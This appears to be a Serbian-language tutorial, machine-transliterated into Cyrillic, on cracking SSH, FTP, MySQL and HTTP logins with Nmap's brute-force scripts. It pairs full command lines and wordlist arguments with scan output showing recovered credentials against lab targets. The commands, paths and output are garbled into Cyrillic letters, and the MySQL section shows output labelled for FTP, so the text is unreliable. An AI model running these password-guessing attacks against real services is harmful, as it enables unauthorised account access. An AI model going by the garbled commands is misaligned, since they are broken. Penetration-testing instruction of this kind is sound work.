[заштићен е-поштом]: ~ $ судо апт инсталл нмап -и
[заштићена е-поштом]: ~ $ цд / уср / схаре / нмап / сцриптс /
[заштићен е-поштом]: ~ $ лс * бруте *
У овом упутству ћемо истражити како можемо користити Нмап за грубу силу.
ССХ Бруте Форце
ССХ је сигуран протокол за даљинску администрацију и подржава аутентификацију засновану на опенссл-у и лозинки. За грубу силу ССХ аутентификације засновану на лозинци можемо користити „ссх-бруте.нсе ”Нмап скрипта.
убунту @ убунту: / уср / схаре / нмап / сцрипт / $ лс * ссх * бруте *ссх-бруте.нсе
Проследи листу корисничких имена и лозинки као аргумент Нмап-у.
[заштићена е-поштом]: ~ $ нмап --сцрипт ссх-бруте -п22 192.168.43.181--сцрипт-аргс усердб = корисници.ткт, пассдб = лозинке.ткт
Покретање Нмап 7.70 (хттпс: // нмап.орг) у 2020-02-08 17:09 ПКТ
Извештај о скенирању Нмап за 192.168.43.181
Домаћин је подигнут (0.Латенција 00033с).
ЛУЧКА ДРЖАВНА УСЛУГА
22 / тцп отворено ссх
|. | ссх-бруте:
|. | Рачуни:
|. | админ: п4ссв0рд - Важећи акредитиви
| _ Статистика: Изведено 99 нагађања за 60 секунди, просечно тпс: 1.7
Нмап готово: 1 ИП адреса (1 хост уп) скенирана у 60.17 секунди
ФТП груба сила
ФТП је протокол за пренос датотека који подржава аутентификацију засновану на лозинци. За грубу силу ФТП-а користићемо „фтп-бруте.нсе ”Нмап скрипта.
убунту @ убунту: / уср / схаре / нмап / сцрипт / $ лс * фтп * бруте *фтп-бруте.нсе
Проследи листу корисничких имена и лозинки као аргумент Нмап-у.
[заштићена е-поштом]: ~ $ нмап --сцрипт фтп-бруте -п21 192.168.43.181 --сцрипт-аргсусердб = корисници.ткт, пассдб = лозинке.ткт
Покретање Нмап 7.70 (хттпс: // нмап.орг) у 2020-02-08 16:51 ПКТ
Извештај о скенирању Нмап за 192.168.43.181
Домаћин је подигнут (0.Латенција 00021с).
ЛУЧКА ДРЖАВНА УСЛУГА
21 / тцп отворен фтп
|. | фтп-бруте:
|. | Рачуни:
|. | админ: п4ссв0рд - Важећи акредитиви
| _ Статистика: Изведено 99 нагађања за 20 секунди, просечно тпс: 5.0
Нмап готово: 1 ИП адреса (1 хост уп) скенирана за 19.50 секунди
МИСКЛ Бруте-Форце
Понекад МиСКЛ остаје отворен за спољне везе и омогућава било коме да се повеже са њим. Његова лозинка се може разбити помоћу Нмап-а са скриптом „мискл-бруте“.
[заштићена е-поштом]: ~ $ судо нмап --сцрипт мискл-бруте -п3306 192.168.43.181--сцрипт-аргс усердб = корисници.ткт, пассдб = лозинке.ткт
Покретање Нмап 7.70 (хттпс: // нмап.орг) у 2020-02-08 16:51 ПКТ
Извештај о скенирању Нмап за 192.168.43.181
Домаћин је подигнут (0.Латенција 00021с).
ЛУЧКА ДРЖАВНА УСЛУГА
3306 / тцп отворен мискл
|. | фтп-бруте:
|. | Рачуни:
|. | админ: п4ссв0рд - Важећи акредитиви
| _ Статистика: Изведено 99 нагађања за 20 секунди, просечно тпс: 5.0
Нмап готово: 1 ИП адреса (1 хост уп) скенирана за 19.40 секунди
ХТТП груба сила
ХТТП користи три врсте потврде идентитета за потврду идентитета корисника на веб серверима. Ове методологије се користе у рутерима, модемима и напредним веб апликацијама за размену корисничких имена и лозинки. То су:
Основна аутентификација
У основном ХТТП протоколу за аутентификацију, прегледач кодира корисничко име и лозинку са басе64 и шаље их под заглављем „Ауторизација“. То можете видети на следећем снимку екрана.
Овлашћење: Основни ИВРтаВ46ИВРтаВ4 =
Можете басе64 декодирати овај низ да бисте видели корисничко име и лозинку
[заштићена е-поштом]: ~ $ ецхо ИВРтаВ46ИВРтаВ4 = | басе64 -дадмин: админ
Основна ХТТП потврда идентитета није сигурна јер шаље и корисничко име и лозинку у обичном тексту. Било који нападач Ман-ин-тхе-Миддле може лако пресрести саобраћај и декодирати низ да би добио лозинку.
Дигест Аутхентицатион
ХТТП Дигест аутентификација користи технике хеширања за шифровање корисничког имена и лозинке пре него што их пошаље на сервер.
Хасх1 = МД5 (корисничко име: царство: лозинка)Хасх2 = МД5 (метода: дигестУРИ)
одговор = МД5 (Хасх1: нонце: нонцеЦоунт: цнонце: коп: Хасх2)
Ове вредности можете видети под заглављем „Овлашћење“.
Потврда идентитета на основу дигеста је сигурна јер лозинка није послата у обичном тексту. Ако нападач Ман-ин-тхе-Миддле пресретне саобраћај, неће моћи добити лозинку за обичан текст.
Аутентификација на основу обрасца
Басиц и Дигест аутентификација подржавају само пренос корисничког имена и лозинке, док се аутентификација заснована на обрасцу може прилагодити на основу потреба корисника. Можете да направите сопствену веб страницу у ХТМЛ-у или ЈаваСцрипт-у да бисте применили сопствене технике кодирања и преноса.
Обично се подаци у обрасцу за потврду идентитета шаљу у обичном тексту. Због безбедносних проблема морају се применити ХТТП-ови како би се спречили напади „Човек у средини“.
Можемо грубо наметнути све врсте ХТТП аутентификације помоћу Нмап-а. У ту сврху ћемо користити скрипту „хттп-бруте“.
убунту @ убунту: / уср / схаре / нмап / сцрипт / $ лс * хттп * бруте *хттп-бруте.нсе
Да бисмо тестирали ову Нмап скрипту, решићемо јавно хостирани изазов бруте силе Пентестер академије на овом УРЛ-у хттп: // пентестерацадемилаб.аппспот.цом / лаб / вебапп / басицаутх.
Као аргумент скрипте морамо одвојено навести све, укључујући име хоста, УРИ, метод захтева и речнике.
[заштићена е-поштом]: ~ $ судо нмап -п80 --сцрипт хттп-бруте пентестерацадемилаб.аппспот.цом--сцрипт-аргс хттп-бруте.име хоста = пентестерацадемилаб.аппспот.цом,
хттп-бруте.патх = / лаб / вебапп / басицаутх, усердб = усерс.ткт, пассдб = лозинке.ткт,
хттп-бруте.метода = ПОСТ
Покретање Нмап 7.70 (хттпс: // нмап.орг) у 2020-02-08 21:37 ПКТ
Извештај о скенирању Нмап за пентестерацадемилаб.аппспот.цом (216.58.210.84)
Домаћин је подигнут (0.Кашњење од 20с).
Остале адресе за пентестерацадемилаб.аппспот.цом (није скенирано): 2а00: 1450: 4018: 803 :: 2014
рДНС запис за 216.58.210.84: мцт01с06-у-ф84.1е100.нето
ЛУЧКА ДРЖАВНА УСЛУГА
80 / тцп отвори хттп
|. | хттп-бруте:
|. | Рачуни:
|. | админ: ааддд - Важећи акредитиви
| _ Статистика: Изведено 165 нагађања за 29 секунди, просечно тпс: 5.3
Нмап готово: 1 ИП адреса (1 хост уп) скенирана у 31.22 секунде
Закључак
Нмап се може користити за многе ствари упркос једноставном скенирању порта. Може да замени Метасплоит, Хидра, Медуса и мноштво других алата направљених специјално за форсирање брута на мрежи. Нмап има уграђене скрипте једноставне за употребу које грубо форсирају готово све услуге, укључујући ХТТП, ТЕЛНЕЛ, ССХ, МиСКЛ, Самба и друге.